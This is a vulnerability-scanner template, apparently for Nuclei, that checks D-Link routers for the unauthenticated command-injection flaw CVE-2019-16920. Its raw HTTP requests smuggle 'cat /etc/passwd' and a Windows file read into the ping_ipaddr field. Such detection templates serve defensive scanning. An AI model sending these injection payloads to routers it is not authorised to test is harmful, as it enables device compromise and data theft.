2021-01-02 04:59:06 +00:00
id : CVE-2019-16920
2020-10-01 08:21:26 +00:00
info :
2022-05-17 09:11:26 +00:00
name : D-Link Routers - Remote Code Execution
2020-10-01 08:21:26 +00:00
author : dwisiswant0
severity : critical
2022-05-17 09:11:26 +00:00
description : D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565 contain an unauthenticated remote code execution vulnerability. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these issues also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected router, potentially leading to complete compromise of the device and the network it is connected to.
2023-09-06 12:53:28 +00:00
remediation : |
Apply the latest firmware update provided by D-Link to mitigate this vulnerability.
2022-04-22 10:38:41 +00:00
reference :
2022-05-18 20:58:07 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-16920
2022-04-22 10:38:41 +00:00
- https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r
2022-05-17 09:18:12 +00:00
- https://fortiguard.com/zeroday/FG-VD-19-117
- https://www.seebug.org/vuldb/ssvid-98079
- https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-16920
cwe-id : CWE-78
2023-10-14 11:27:55 +00:00
epss-score : 0.96307
2024-01-14 13:49:27 +00:00
epss-percentile : 0.99432
2023-09-06 12:53:28 +00:00
cpe : cpe:2.3:o:dlink:dir-655_firmware:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 3
2023-07-11 19:49:27 +00:00
vendor : dlink
product : dir-655_firmware
2024-01-14 09:21:50 +00:00
tags : cve2019,cve,dlink,rce,router,unauth,kev
2020-10-01 08:21:26 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-10-01 08:21:26 +00:00
- raw :
- |
POST /apply_sec.cgi HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2021-09-08 12:17:19 +00:00
Referer : {{BaseURL}}
2020-10-01 08:21:26 +00:00
html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384
- |
POST /apply_sec.cgi HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2021-09-08 12:17:19 +00:00
Referer : {{BaseURL}}/login_pic.asp
2020-10-01 08:21:26 +00:00
Cookie : uid=1234123
html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}}
- |
POST /apply_sec.cgi HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2021-09-08 12:17:19 +00:00
Referer : {{BaseURL}}/login_pic.asp
2020-10-01 08:21:26 +00:00
Cookie : uid=1234123
html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}}
2021-09-08 12:17:19 +00:00
2020-10-01 08:21:26 +00:00
matchers-condition : and
matchers :
- type : regex
2022-05-17 09:11:26 +00:00
part : body
2020-10-01 08:21:26 +00:00
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2020-10-01 08:21:26 +00:00
- "\\[(font|extension|file)s\\]"
condition : or
2021-09-08 12:17:19 +00:00
2020-10-01 08:21:26 +00:00
- type : status
status :
2022-05-17 09:11:26 +00:00
- 200
2024-01-26 08:31:11 +00:00
# digest: 4a0a0047304502204698c6381f3e004fea5d57de21f37074fac2baa091632565fbbddbeac9324de5022100d8fbac46d3a9e2bff9762f17b4a3cbc65ef6f816fa88d5cb600959842bc287b7:922c64590222798bb761d5b6d8e72950
